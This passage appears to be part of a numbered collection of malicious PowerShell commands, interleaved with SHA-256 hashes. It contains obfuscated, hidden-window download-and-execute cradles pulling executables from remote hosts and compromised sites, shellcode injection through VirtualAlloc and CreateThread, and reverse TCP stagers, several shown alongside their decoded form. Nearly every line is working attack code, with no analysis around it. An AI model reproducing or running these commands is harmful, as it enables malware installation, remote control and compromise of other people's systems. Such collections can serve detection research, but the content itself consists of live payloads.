  473. powershell -nop -win hidden -noni -enc SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAcgBWAFoAdABiADUAdABJAEUAUAA0AGUASwBmADkAaAB6AHUASABPAG8AQgBwAGsAdQAwADEAMQBGAHkAbQBWAFUAdQBvADcAVwBVAHAAVABLADAAVABLAEIAOAB1ADYARQBCAGcASABMAG4AZwBYAEwAWQB0AGYAbABQAGEALwAzACsAeQBDAEQAZABpAE8ANAB6AHMAVgBKAFEAYQBXAG0AVwBlAGYARwBaADYAWgBZAFoAcQB6AFEATQBhAGMAdwBaAEQATgArAFQAUABhAEkANwA1AEEANABVAFcAWQBKAEgAZABCAEMAcQBjAG4ATAAvAFEAUABkAEkAegBkAFcAWgBpAGcALwBCAHkAegBNAEcAWgBQADUAaABlAGMAKwBuAGsAaQBSADcANwB3AFoAeQBqAEoAQQArAFUATgBYAFYAMgAyAEIATQA1AFIAWgBOAGkAeQBKAHEAQQBmAG0AcQBjAG4AQgBZAEEARwAyAGQAaQBiAEkANQA3AEYAZQB0ADkATAA2AEgAYgBnAHEAOAA5AEMAWAAzAEsAeABvAGwAdABEAGkAaAB3ADcAYwBBAGoANgB2AHkASgBPAC8AUwBUAGIAQwAvAGwASQA0AFQAVAB4AFAAQwBrAG8AdgB0AHEASwBNAFIAeABkAGgAYQBIAEEATABPAHUAOABIAFUAcgB2AHAANABkAHkATABPAEoAdQBKAEUATQBtADYAMgBHAE0AdQBKAEMAdgBSAG4AQQBjAFEAVwA4AFIAeQB5AEMAcQBnADkANABXAFoAcwBmAGoANwBrAG4ANABEAHEAagBTADIAQgByAFEAVwBsADgAVQB2ADUASwBTAFUARgB5ADkAVgBBADUAbgBMAG0AYwBNAEEAdwBtAFAAZgB2AEEATQA4AFIAUgBrAGgARgBBAEcAQQBKAG0ARwBoAHoAaQBEAFAATQBQAFEAcQBiAHoASQB6AGwAegB6AHQANgByAGwARwBxADQAbQBFAHkAUQB4AE0AawBtAFoAdgA4AEcARgAvAGUAMwB4AEgANwBXAFAAdAA4AG8AawB6AHAAdwBiAGwASQA3AEgAZwAyAGUAVQBtAFgAUABuAGoAbAB4AHQAYQBkAGIAMABvAG4ATgBlAHcALwA1AFIAVAA5AE8AWgBDAGgATQBrADEAMgB4AFQAdwBlAGQAeABpAEMARwBrADUASwBHAG8ANgBZAGUASAB1AFMAdQBUAEEAOABTAFQAbQBFAGcAeQBGAEUAUgA5AHYASQA5AHcAawBGADYAWABGAGgAUABOADgAeABWADMASgA1AE8AKwBrAEsAWgBWAHYAWQBQAGQAMQBGAFQARwBWADAARwBBAHEAUwBUAHMATQBoAG4AMQA0AEsARQBlAHYAWgBGAEoAZwBmADUATQBPAFIAYwB3AHoAbAA4AG8AUABiADEAVwBkAHgAbwAvAHIAaQBTAE8ASgB4AE4ARABuAFQATgBWADIAWQA3AHoAOABmAHoAOAAvAGYAbgAzAFgAMQArADYAegBYAFIANg
BTAEIAbgBUAEMAZwBoAHkASQBSAFEAeABTAHAAcABnAHAARABxAGcAKwBvAEcAQQB6ADkASgBjAEYAZwB0ADEARwB1AFMAMQB4AGoAYgBIAEUAcABmAFMAUQBSAFoAdwAxAGUATQBtAEYAeABkAFgAbgBqAHMAYwBXAG8AcgBhAFoAMgBWAGoAdAB1ADQAcAA1ADMAeQBSAFEAZABVAGwAUQBlAFMATQBrAFQAWAA0ACsAaQAwAEoAYQBNAEUANwBNAEoARABOAEwAegBiAGIAdgA2AE0AMQBxAHUAWABOAGcAegBvAFYAOQBmAEMAQgB1AFQAeABkAGkAZgBnAHAAawBtAEMANgBGAHYAUwA3AHYAWABQADQARwBnAGUAQwBaADMAdwBxAHcAZQBXAEMAVgBPAEcAcgBmAHUARABBAGwAZABwAFIAVwBXAGEAawBjAE4AcABnAFQAcgBwADQAWQBBACsAcwBaAGUAMwBrADEAcgBrAFgAcwBVAFMAegBDAHIASABUADcAVgBRADMAegBqAFcAeQBKAHgAbABaAHoAUgB4AEcAZgBFAEgAWgBnAHAAZwBSAFAAWgAvAG0AdwBoAHoAcgBvAFoASgBLAFoANgBuADgAMwA5AGwAcgBqAHoAeABvAFUAOABBAG0AcgBkAGoAWABQAE4AQQBoAFcAYwA3AEkAbAB4AEcAdAB0AGoAKwAxAGYAMABZAE0AaQB5AGgATwAwAEQAUwBOAFcARQBtAHIAQgBMAGwARgBQAHoAUQBMAEMAWABYAFUAYgBEAEEAYQAzAGgAYgBZAEQASwBGADcAbwBKAFEARwBLAGkAWQBNADcAeQBpACsAWgBpAE8AdwA3ADEAWQBwAHEAcwBhADIAYgBnAG4ASwB4AE4ARgB4AEQAOABvADgAYgBFAEYAUgBJAC8AYwBWAHMAeABwAGsAcQBYAHcAMQBWAFkAMQAxAGoARwBEAEUAVgB0AE8AVABPAGwAOQB6AFkAWQB1AGsAZgBuACsARABKAFEAYQBrAEwATgAxAFMAUwBHAFUAegBKAFgAeABTAG4AcgBxAGwASwBuADYAaQA4AHQAOQAxAEsAdABLAHAANgBvAGIAZQBZAGYAawBSAE0ARgBpAG0AcQBvAEcAcABDAFcAUwA3AEoAVQA1AEIAdgBmAC8AcAB0AHgANQA4AGgAMgArADUAdABBAHYATwBzAE0AWAB6AFIALwBPAFcAWABuAEkAUQB2AFUAbABjAHYAMgBYADcAMwBoAGUANgBrAGwAbwBlAHAANgBFAFIAcQBjAHUARgBxAHUATwBGADQATwBvAHkASgBwAG0AZwBEAGwARAB4ADQAdABOAFgASQBtAHoAQgBhAC8AZwBEAEkAYgBnAEEANAArACsARABoAEQAZgBwADYASQBOAFcAMABEAG8ANQBKAE4AQQAzADUAQQB2AHQATABhAFMAbAB5AHEAaQBCAGEAdABkAHgAZAA5AEwASQAyAGwAYgBTAEMAaQBNAG4AUwBOAEEAWAA1AHYAYQB6AGkAdABCAGwALwBZAGEAYQB5AGIASQB1AGYASABXAGMAMwBhAEwATQBCAFMAcwBIAFkARQBZAGYAYQBOAGsAKwBNAEIATABaAFUAUQBWAGIANwBiAGIARABhAFcAOQAxADEAbwB1AHoAcQBzADEAOQBqAG4AOABtAGUAUgBhAHAAbwBkAEkAWQBqAGgAdQByAGMAaQBTADQAQwBjACsAdwBuAGcAOAA5ADkAOQBiAEQANQBvAGoAWgA1ADMAaQBTAHAANgBhADEAcwAwAGwANQBxAG8AbQB6AGgAbgBDAEUARwBIADgAQgBOADgATABxAFcAMABQADMAWQBhAEgAbQBOAEEAVQBYAFIAUAA1AGoAVQBzAHkAYwBGAGMALwBCAEYAMABoAHoAUQBiAGsAWABSAFUAbQBqAGkAUgBxAEgARwB2AE0ATgBwAGUANQBUAEsATA
BHAGsAdgA3ADMAZgA1AFgAYgA1ADQAUQBMADIANQBtAHMARABlAG4ALwAwAG4AZAA3AEgAMwA1ADAAUABkAEgAcgBmAEIAMQBzAE4AZABmAGgAQQB4ACsAbgBKAHYAdwA9AD0AJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA== --> Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
  474. e84ee351c24e6d8776eaf1996f17557aeea9e2d6bd84b5ac8ef35f70c08653c8
  475. powershell -w hidden -ep bypass -nop -noexit -c "IEX ((New-Object System.Net.Webclient).DownloadString('http://pastebin.com/raw/Wbg6bs9Y'))"
  476. 8d1eb32bba0336d767d96652af99f1f73fa546cedab4271f5ac692bfc03d886e
  477. PowerShell.exe  (New-Object System.Net.WebClient).DownloadFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n', 'C:\Users\User1\AppData\Local\Temp\conjunctiva.exe'); start 'C:\Users\User1\AppData\Local\Temp\conjunctiva.exe'
  478. 207f4be122ffd6ac50000d76a8d718e0b489a7eea6ea14906faba2fdd6e507ea
  479. PowerShell.exe  -Exec ByPass -Nol -Enc JABiAHIAbwB3AHMAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYgByAG8AdwBzAGUAcgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AEkARQBYACAAJABiAHIAbwB3AHMAZQByAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADkAMgAuADYAMAAuADEANAAuADEANgAwADoAOAAwADAAMAAvAHAAYQB5AGwAbwBhAGQAIgApADsAIABJAG4AdgBvAGsAZQAtAFMAaABlAGwAbABjAG8AZABlAA== --> $browser = New-Object System.Net.WebClient; $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials;IEX $browser.DownloadString("http://92.60.14.160:8000/payload"); Invoke-Shellcode
  480. b84c31524ea09ae6fc6a413f13a505a73f2349a2e3ebd622f1b7c13efe42090d
  481. powershell.exe  -ExecutionPolicy bypass -noprofile (New-Object System.Net.Webclient).DownloadFile('http://aclawgroup.com.au/2.zip','C:\Users\User1\AppData\Roaming\WndUpdate\2.exe.zip'); (new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\').CopyHere((new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\2.exe.zip').Items(),16)
  482. 131acdc92d26c8b65c7a79464596de182ff8aa8c0553aa21a5c3fd661bda8540
  483. 29f930c333d3aa4bb8a81f0bb87a0f01cc2fec42920ca158270ad4f962f51d7c
  484. 2b5d4eed392f00c194c8305a3a007afe6dcff72c0f0b7697f5e157f54e50516f
  485. 617bd95470f2c3d200534f4b4d1f2d49a72e5b91075ac3308e573a65a7669737
  486. 8342bd5b9523814c5774d28310e4dd193ddb6809f1b03b5afe23de0df002ba39
  487. a935116d2ec04f86b9c1c5b3787cee0c64aaba7d594a0e8199f01ae89549910f
  488. e848e1bd6d25e1e5b8f1d0c70bbb9175f4f6e3e88bb347cd71d8abf37cb4520f
  489. f1f34d805dd1d92373725812f05b5c83cb573d3958166655ba0d391d45f56345
  490. PowerShell.exe  -WindowStyle hidden -ExecutionPolicy Bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://traplab.me/pimp/pimp.html','C:\Users\User1\AppData\Local\Temp\pimp.html'); expand C:\Users\User1\AppData\Local\Temp\pimp.html C:\Users\User1\AppData\Local\Temp\pimp.exe; start C:\Users\User1\AppData\Local\Temp\pimp.exe;
  491. 06e4851467a62197711f98d9bec6c4c37ebe4b49df35a5036b7bcf6fb27f39b0
  492. 365c55224226cb733edb7166f1a24aa720b3123a4e5215e8ce252ced9a648159
  493. 9ef6c3b95c66ee62e1670e49a7e149d666e4df23a2fd17fc886543d906f82cd2
  494. ad7455fd5692ac75bf5cddcd742b86b25a597058d742314ac1f849d8418345d1
  495. powershell.exe "IEX ((new-object net.webclient).downloadstring('http://42.114.206.24:2121/payload.txt '))"
  496. e867479c271a2fc10c12252826610a592ddc3bb8e61d2d68ad28b1fa680d82a4
  497. powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://egylegal.com/wp-content/plugins/libravatar-replace/scrwin.exe','C:\Users\User1\AppData\Local\Temp\22322.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\22322.exe'
  498. 28f93148f7f803b637805e7fd8d3d89f95778b50798e92ca649b18cf4f1f68d7
  499. powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://sonypanel.co.uk/zemtiekimas/ewac/atc/sdfgroup/v1.exe','C:\Users\User1\AppData\Local\Temp\43524.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\43524.exe'
  500. dfe5b0fb5b155b8f8259b52571379de56ec5e780572d4c3793681befb2470eed
  501. powershell.exe c:\temp\spool.exe --> $LR8l = '$UCR = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $UCR -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xbf,0x50,0xa0,0x9d,0xf5,0xda,0xdf,0xd9,0x74,0x24,0xf4,0x5d,0x33,0xc9,0xb1,0x58,0x31,0x7d,0x15,0x03,0x7d,0x15,0x83,0xc5,0x04,0xe2,0xa5,0x5c,0x75,0x77,0x45,0x9d,0x86,0x18,0xcc,0x78,0xb7,0x18,0xaa,0x09,0xe8,0xa8,0xb9,0x5c,0x05,0x42,0xef,0x74,0x9e,0x26,0x27,0x7a,0x17,0x8c,0x11,0xb5,0xa8,0xbd,0x61,0xd4,0x2a,0xbc,0xb5,0x36,0x12,0x0f,0xc8,0x37,0x53,0x72,0x20,0x65,0x0c,0xf8,0x96,0x9a,0x39,0xb4,0x2a,0x10,0x71,0x58,0x2a,0xc5,0xc2,0x5b,0x1b,0x58,0x58,0x02,0xbb,0x5a,0x8d,0x3e,0xf2,0x44,0xd2,0x7b,0x4d,0xfe,0x20,0xf7,0x4c,0xd6,0x78,0xf8,0xe2,0x17,0xb5,0x0b,0xfb,0x50,0x72,0xf4,0x8e,0xa8,0x80,0x89,0x88,0x6e,0xfa,0x55,0x1d,0x75,0x5c,0x1d,0x85,0x51,0x5c,0xf2,0x53,0x11,0x52,0xbf,0x10,0x7d,0x77,0x3e,0xf5,0xf5,0x83,0xcb,0xf8,0xd9,0x05,0x8f,0xde,0xfd,0x4e,0x4b,0x7f,0xa7,0x2a,0x3a,0x80,0xb7,0x94,0xe3,0x24,0xb3,0x39,0xf7,0x55,0x9e,0x55,0x69,0x00,0x55,0xa6,0x1d,0xbd,0xfc,0xc8,0xb4,0x15,0x97,0x58,0x30,0xb3,0x60,0x9e,0x6b,0x8a,0xb5,0x33,0xc7,0xbf,0x1a,0xe7,0x8f,0x05,0xcb,0x7e,0xf7,0x86,0x26,0xd3,0xa4,0x12,0xca,0x87,0x19,0x8a,0x97,0x36,0x9e,0x4a,0xc0,0xb5,0x9e,0x4a,0x10,0xe9,0xd7,0x0e,0x53,0xbf,0xa5,0x8e,0x03,0x57,0x7d,0x07,0x3c,0x61,0x7e,0xc2,0xca,0xa8,0xd2,0x84,0xcc,0x06,0x35,0xd0,0x9e,0x35,0xe6,0x8f,0x73,0xec,0x60,0xc4,0x21,0x3e,0x4a,0xe5,0x1f,0xa8,0xc6,0x13,0xff,0xbd,0x96,0x10,0xff,0x3d,0x1e,0xb6,0x95,0x39,0x70,0x5c,0x75,0x14,0x18,0xd5,0xcf,0x06,0x5e,0xea,0x05,0x65,0x0c,0x47,0xf5,0xdc,0xda,0x4a,0
xff,0xf8,0x61,0x6b,0x2a,0x7d,0x55,0xe6,0xdf,0x31,0x23,0xd1,0x88,0x3d,0x7e,0x43,0x1e,0x41,0x54,0xe9,0xdf,0xd5,0x57,0xfd,0xdf,0x25,0x30,0xfd,0xdf,0x65,0xc0,0xae,0xb7,0x3d,0x64,0x03,0xad,0x41,0xb1,0x30,0x7e,0xed,0xb3,0xd1,0xd6,0x79,0xc4,0x3d,0xd9,0x79,0x97,0x6b,0xb1,0x6b,0x81,0x1a,0xa3,0x73,0x78,0x99,0xe4,0xf8,0x4e,0x2a,0xe3,0x01,0x92,0xa9,0x2c,0x74,0xf1,0xe9,0x6f,0x28,0x11,0x7c,0x8f,0x28,0x1e,0x09,0x18,0xa0,0xd2,0xdb,0x85,0x26,0x67,0x4c,0x27,0xd2,0xaa,0xe7,0xc7,0x32,0xd1,0x66,0x5c,0x2e,0x19;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$GgD=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($GgD.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$GgD,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($LR8l));$VqZ = "-EncodedCommand ";if([IntPtr]::Size -eq 8){$mEm = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $mEm $VqZ $e"}else{;iex "& powershell $VqZ $e";}
  502. cfce4827106c79a81eef6d3a0618c90bf5f15936036873573db76bed7e8a0864
  503. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" 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 \" )))), [IO".Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);"@try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)$s.Connect('192.168.1.27', 443) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBFwhile ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  504. 23e03d6d58d4811155befe334698a42529b42eaaab27e7023c3a885a18d7bfa8
  505. 3e11f2100a8cc6f8958f42c532c70c75a52075ecfaadf53266a3ecba1d4b0d5f
  506. c963d06f585ae9d74cb8902c0dc3896bf111f8f3080484973a0fb0e46b766705
  507. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" 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 \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);"@try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)$s.Connect('192.168.1.27', 443) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBFwhile ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  508. 8d00faf38de584941a9325915d9fe6b8aeeade5e13b2c2ce57ae961548c4fe37
  509. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRtb9pIEP7OrxhZe5KtYMe8NCVYkZqSps1dSdNAk94hdFrsAW9Z7zrrdYBQ/nvHxEfSr/fF6xnPzvPMzDNmD3AG75zG5ELKqyzXxrrOEo1C2WkHiZSON4W8nEkRQ2G5pQPXlr7DlbI31sCdMLbk8lxKHbu1T+bnSWKwKJpQCmUhWY3EE9bG/DmWUmk13uQv7hujLcbWi/43l4FBbnGc0pG8cHm2z601YlZafEXK8nj5zOwQTD5jD+wP7htueIaEdbi8x6ISLiVfvI58RrtKqAznXcOazZYl1GHn/P3g4sPlx09Xf/71eXj95ebr7Wj87e7++9//8Fmc4HyRih9LmSmdP5jClo+r9eYpbLU73Tcnb3unTjDWg5Sbc2P4xvUa81LFFTrELnv0tmDQltQH150Qu8l0Cuzx9xvwE4bIi9Kg/2X2g9oM/qjMvIAe8AeE61YYgo8PcNr2di/ZLWzZvGLvRK0g6PycayouTn29T0Hfjs6AJRN3gdY3XCU6Az/ja5FRVpYEn1EtbOpNd1HNj82jV9kRtpAbHVOrYTvhFdEpWxMcPY6A/buLAFVCFNbEviA11LiwdRWu/jNu97heoEgLrrfbvQJYbIEYg8vEWRgxAb60cNKlt6Mjb8tSQrIRW1aACSFgBFAXSFckCOK7pLiiCkgrRjICMQeXel54Hhy6ThEEWxvO6eP3bw6VOblGG4zQPIoYbzSNZcgVX6CZ9vuVF80AjRVzQZuAd1yKZC+nAZdyRrIkzC2zpsRdxDIyrqngenCjTWExC6r09zgbSIHKRg2WBZ9IeGiKgOTrOmWBxic8ZZ0mOEP9JKTkx90gJP46ywlsJqni4ejqA5wErQjuBfVxVcD12HO8iCkCXUQweb+xuBdUXrUhCy70SknNkwtuueuk1uZF//i41WsFrXYYtN6+CVq9Xr/X7XaOmXLAazBNF4mSXy07yQOzGZoLnAsl9kNiD+Bf03KBQww6bQd8RVaR8xhh77msx1mAn/OisKkpG2x9xnS//9vPJ2yyvJZcM1x3wjCkoxt60aTu2G2prMgwoF1Fo/N6NkUw5KZIuaTBDHS+cVnehLAJk+eVnrpsTatERqftel4TDiBVaXTl9T+HEJts3ayOsFo5XVpflZJ0s/+v+COJmNPmYaxJ2L2TbhjuaP5xut39Ag== \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $q = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object 
-Sum).Sum % 0x100 -eq 92)}function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://181.120.175.188:8443/$n" )$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  510. d7e0c237a4c8c777e6a6125d7743a26995dcc634d8be97cfc711d3c63893d9ad
  511. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" 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 \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $q = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)}function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://192.168.0.5:8443/$n" )$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  512. 253a94d84c9a398a0ac69f030037502efd6b13c6bdda785a4e9be73ee76eb0d6
  513. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRtc9o4EP7Or9jx6GbsCVbMS9OAJzOl0Fy5FpoLtOkdw9wIW2AXWXJkGUwo//3W4CP0632xvNLuPs+unhV5hjt4Z9VmAyGGSaq0sa0115KLVpOGQljOHNJ8IeIAMsMMLrwweA5DaR6Mhm+xNjkTPSFUYFd7Iu2FoeZZVoc8lgbC7SR+4ZWxPPliKiWnu/R1+0ErwwPj+P+bS19zZvg0wiV85XKye8boeJEbfkHKsGB9YnZ2xj1tzuzP2w9Ms4Qj1jn4iIUl3Au2uvQ8oQ1DLMN6VzN6tychdtjqve8PPtz//nH4x6fPo/GXhz8fJ9Ov356+//U3WwQhX66i+MdaJFKlzzoz+WZb7F68RrPVfnPz9rZj0anqR0z3tGY726ktcxmU6BDYZOPsQXOTYx9se4bsZvM5kM2vEfATRpxluebul8UPbDO4kzxxKH7gN/CKhueBy5+h03QOr9kN7MmyZG/5DUpbP5cKiwsiVx1T4NnVHZBwZq+4cTWToUrATVgRJ5iVhPQzlysTOfODX/EjS/8iO4c9pFoF2GrYz1hJdE4KhMPPFZB/Dj5wGSKFAtlnqIYKF/a25Nv/jMcjrkMlasF2DocLgNUekDHYJL7zfBKDKwzctPHv6srZkwiRjE/WJWCICNwHqArEEAEx8l2jX1Y6RCUj4UO8BBt7njkOnLuOHghbGVZn8/2rhWWSBOPGyLPq92SXGZ7QMTf0iS/6IuYS0RP6EeXCdUZRdLaVZ1y7bIVHVh2skXqJhWDXbeohqkpSVNxCIM/RZPgBbmjDh6cYq99mMJ46llMjEjFXPsze7ww/yiAtySd0oLZSKBYOmGG2FRmTdq+vG60OfdOhjfYtbdx63Xa7dU2kBZhGYRTyccv5xBvlyYLrAV/GMj72lTyDO8Z5AAvhW00LXIlWlrKAw3HnvrqBDNyUZZmJdF4jxR1R3e4v74VXJ2mlkrpXtDzPw6XtOf6s6tZjLk2ccIrjxbVKJ1xvYtQLHTGdRUzMu92+Snc2Sevg1WF2msK5TQpUPxqtpu04dTiDl